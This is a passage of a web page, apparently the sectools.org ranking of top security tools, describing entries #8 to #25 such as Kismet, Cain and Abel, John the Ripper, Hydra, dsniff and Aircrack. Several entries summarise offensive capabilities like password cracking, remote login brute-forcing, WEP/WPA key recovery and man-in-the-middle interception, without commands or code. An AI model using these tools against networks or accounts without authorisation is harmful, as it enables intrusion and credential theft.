powerful wireless sniffer<br />Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as <a href="http://sectools.org/index.html#netstumbler">NetStumbler</a>), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for <a href="http://en.wikipedia.org/wiki/Wardriving">wardriving</a>. Oh, and also <a href="http://en.wikipedia.org/wiki/Warwalking">warwalking</a>, <a href="http://www.tgdaily.com/2004/04/30/thg_takes_to_the_air_for_wi/print.html">warflying</a>, and <a href="http://www.oldskoolphreak.com/tfiles/wifi/warskating/warskating.html">warskating</a>, ... <p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="tcpdump"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#8</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.tcpdump.org/"><img src="http://mirror.sectools.org/logos/tcpdump-80x70.png" align="right" border="0" width="80" height="70" /></a> <a href="http://www.tcpdump.org/">Tcpdump</a> : The classic sniffer for network monitoring and data acquisition<br />Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named <a href="http://windump.polito.it/">WinDump</a>. TCPDump is the source of the <a href="http://www.tcpdump.org/">Libpcap</a>/<a href="http://winpcap.polito.it/">WinPcap</a> packet capture library, which is used by <a href="http://insecure.org/nmap/">Nmap</a> among many other tools. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="cain"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#9</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">23</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.oxid.it/cain.html"><img src="http://mirror.sectools.org/logos/cain-80x32.png" align="right" border="0" width="80" height="32" /></a> <a href="http://www.oxid.it/cain.html">Cain and Abel</a> : The top password recovery tool for Windows<br />UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also <a href="http://www.oxid.it/ca_um/">well documented</a>. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a>, and <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="john"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#10</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">1</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.openwall.com/john/"><img src="http://mirror.sectools.org/logos/john-80x163.png" align="right" border="0" width="80" height="163" /></a> <a href="http://www.openwall.com/john/">John the Ripper</a> : A powerful, flexible, and <i>fast</i> multi-platform password hash cracker<br />John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find <a href="ftp://ftp.mirrorgeek.com/openwall/wordlists">here</a>, <a href="ftp://ftp.ox.ac.uk/pub/wordlists/">here</a>, or <a href="http://www.outpost9.com/files/WordLists.html">here</a>. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="ettercap"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#11</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://ettercap.sourceforge.net/"><img src="http://mirror.sectools.org/logos/ettercap-80x22.png" align="right" border="0" width="80" height="22" /></a> <a href="http://ettercap.sourceforge.net/">Ettercap</a> : In case you still thought switched LANs provide much extra security<br />Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="nikto"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#12</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">4</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.cirt.net/nikto2"><img src="http://mirror.sectools.org/logos/nikto-80x98.png" align="right" border="0" width="80" height="98" /></a> <a href="http://www.cirt.net/nikto2">Nikto</a> : A more comprehensive web scanner<br />Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses <a href="http://sectools.org/tools3.html#whisker-libwhisker">Whisker/libwhisker</a> for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="os-tools"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#13</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> Ping/telnet/dig/traceroute/whois/netstat : The basics<br />While there are many whiz-bang high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although for more advanced usage you may be better off with <a href="http://sectools.org/index.html#hping">Hping2</a> and <a href="http://sectools.org/index.html#netcat">Netcat</a>. </td></tr></tbody></table><hr /><a name="ssh"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#14</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <img src="http://mirror.sectools.org/logos/ssh-85x85.gif" align="right" border="0" width="85" height="85" /> <a href="http://www.openssh.com/">OpenSSH</a> / <a href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/">PuTTY</a> / <a href="http://www.ssh.com/commerce/index.html">SSH</a> : A secure way to access remote computers<br />SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source <a href="http://www.openssh.com/">OpenSSH</a> server and client. Windows users often prefer the free <a href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/">PuTTY</a> client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with <a href="http://www.cygwin.com/">Cygwin</a>. Dozens of other free and proprietary clients exist. You can explore them <a href="http://freessh.org/">here</a> or <a href="http://linuxmafia.com/ssh/">here</a>. </td></tr></tbody></table><hr /><a name="hydra"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#15</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">35</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.thc.org/thc-hydra/"><img src="http://mirror.sectools.org/logos/hydra-80x79.png" align="right" border="0" width="80" height="79" /></a> <a href="http://www.thc.org/thc-hydra/">THC Hydra</a> : A Fast network authentication cracker which supports many different services<br />When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like <a href="http://sectools.org/index.html#amap">THC Amap</a> this release is from the fine folks at <a href="http://www.thc.org/">THC</a>. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="paros"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#16</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.parosproxy.org/"><img src="http://mirror.sectools.org/logos/paros-80x41.png" align="right" border="0" width="80" height="41" /></a> <a href="http://www.parosproxy.org/">Paros proxy</a> : A web application vulnerability assessment proxy<br />A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="dsniff"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#17</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">10</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.monkey.org/%7Edugsong/dsniff/"><img src="http://mirror.sectools.org/logos/dsniff-80x96.png" align="right" border="0" width="80" height="96" /></a> <a href="http://www.monkey.org/%7Edugsong/dsniff/">Dsniff</a> : A suite of powerful network auditing and penetration-testing tools<br />This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. A separately maintained partial Windows port is available <a href="http://www.datanerds.net/%7Emike/dsniff.html">here</a>. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="netstumbler"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#18</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">7</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.stumbler.net/"><img src="http://mirror.sectools.org/logos/netstumbler-80x26.png" align="right" border="0" width="80" height="26" /></a> <a href="http://www.stumbler.net/">NetStumbler</a> : Free Windows 802.11 Sniffer<br />Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named <a href="http://www.stumbler.net/">Ministumbler</a>. The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as <a href="http://sectools.org/index.html#kismet">Kismet</a> or <a href="http://sectools.org/tools3.html#kismac">KisMAC</a>. <p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="amap"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#19</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">18</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.thc.org/thc-amap/"><img src="http://mirror.sectools.org/logos/amap-80x79.png" align="right" border="0" width="80" height="79" /></a> <a href="http://www.thc.org/thc-amap/">THC Amap</a> : An application fingerprinting scanner<br />Amap is a great tool for determining what application is listening on a given port. Their database isn't as large as what <a href="http://insecure.org/nmap/">Nmap</a> uses for its <a href="http://insecure.org/nmap/vscan/">version detection</a> feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at <a href="http://www.thc.org/">THC</a>. <p>See all <a href="http://sectools.org/app-scanners.html">application-specific scanners</a> </p></td></tr></tbody></table><hr /><a name="gfi"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#20</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">12</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.gfi.com/lannetscan/"><img src="http://mirror.sectools.org/logos/gfi-70x28.png" align="right" border="0" width="70" height="28" /></a> <a href="http://www.gfi.com/lannetscan/">GFI LANguard</a> : A commercial network security scanner for Windows<br />GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. I also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches. A free trial version is available, though it only works for up to 30 days. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="aircrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#21</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.aircrack-ng.org/"><img src="http://mirror.sectools.org/logos/aircrack-80x63.png" align="right" border="0" width="80" height="63" /></a> <a href="http://www.aircrack-ng.org/">Aircrack</a> : The fastest available WEP/WPA cracking tool<br />Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files). <p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="superscan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#22</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">4</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.foundstone.com/us/resources/proddesc/superscan.htm">Superscan</a> : A Windows-only port scanner, pinger, and resolver<br />SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois. <p>See all <a href="http://sectools.org/port-scanners.html">port scanners</a> </p></td></tr></tbody></table><hr /><a name="netfilter"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#23</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.netfilter.org/"><img src="http://mirror.sectools.org/logos/netfilter-80x21.png" align="right" border="0" width="80" height="21" /></a> <a href="http://www.netfilter.org/">Netfilter</a> : The current Linux kernel packet filter/firewall<br />Netfilter is a powerful packet filter implemented in the standard Linux kernel. The userspace iptables tool is used for configuration. It now supports packet filtering (stateless or stateful), all kinds of network address and port translation (NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many different modules for handling unruly protocols such as FTP. For other UNIX platforms, see <a href="http://sectools.org/tools3.html#openbsd-pf">Openbsd PF</a> (OpenBSD specific), or <a href="http://sectools.org/tools4.html#ipfilter">IP Filter</a>. Many <a href="http://en.wikipedia.org/wiki/Personal_firewall">personal firewalls</a> are available for Windows (<a href="http://www.tinysoftware.com/">Tiny</a>,<a href="http://www.zonelabs.com/">Zone Alarm</a>, <a href="http://sectools.org/index.html">Norton</a>, <a href="http://www.kerio.com/">Kerio</a>, ...), though none made this list. Microsoft included a very basic firewall in Windows XP SP2, and will nag you incessantly until you install it. <p>See all <a href="http://sectools.org/firewalls.html">firewalls</a> </p></td></tr></tbody></table><hr /><a name="sysinternals"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#24</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.microsoft.com/technet/sysinternals/default.mspx">Sysinternals</a> : An extensive collection of powerful windows utilities<br />Sysinternals provides many small windows utilities that are quite useful for low-level windows hacking. Some are free of cost and/or include source code, while others are proprietary. Survey respondents were most enamored with: <ul><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx">ProcessExplorer</a> for keeping an eye on the files and directories open by any process (like <a href="http://sectools.org/tools2.html#lsof">LSoF</a> on UNIX). </li><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/PsTools.mspx">PsTools</a> for managing (executing, suspending, killing, detailing) local and remote processes. </li><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/Autoruns.mspx">Autoruns</a> for discovering what executables are set to run during system boot up or login. </li><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/RootkitRevealer.mspx">RootkitRevealer</a> for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. </li><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/TcpView.mspx">TCPView</a>, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX). </li></ul> <b>Update:</b> Microsoft <a href="http://www.winternals.com/Company/PressRelease92.aspx">acquired Sysinternals</a> in July 2006, <a href="http://www.winternals.com/Company/PressRelease92.aspx">promising</a> that “Customers will be able to continue building on Sysinternals' advanced utilities, technical information and source code”. Less than four months later, Microsoft <a href="http://seclists.org/dailydave/2006/q4/0134.html">removed</a> most of that source code. Future product direction is uncertain. <p>See all <a href="http://sectools.org/rootkit-detectors.html">rootkit detectors</a> </p></td></tr></tbody></table><hr /><a name="retina"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#25</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">5</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.eeye.com/html/Products/Retina/index.html"><img src="http://mirror.sectools.org/logos/retina-106x48.png" align="right" border="0" width="106" height="48" /></a> <a href="http://www.eeye.com/html/Products/Retina/index.html">Retina</a> : Commercial vulnerability assessment scanner by eEye<br />Like <a href="http://sectools.org/index.html#nessus">Nessus</a>, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by <a href="http://www.eeye.com/">eEye</a>, who are well known for their <a href="http://www.eeye.com/html/research/index.html">security research</a>. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table>Praba.... a 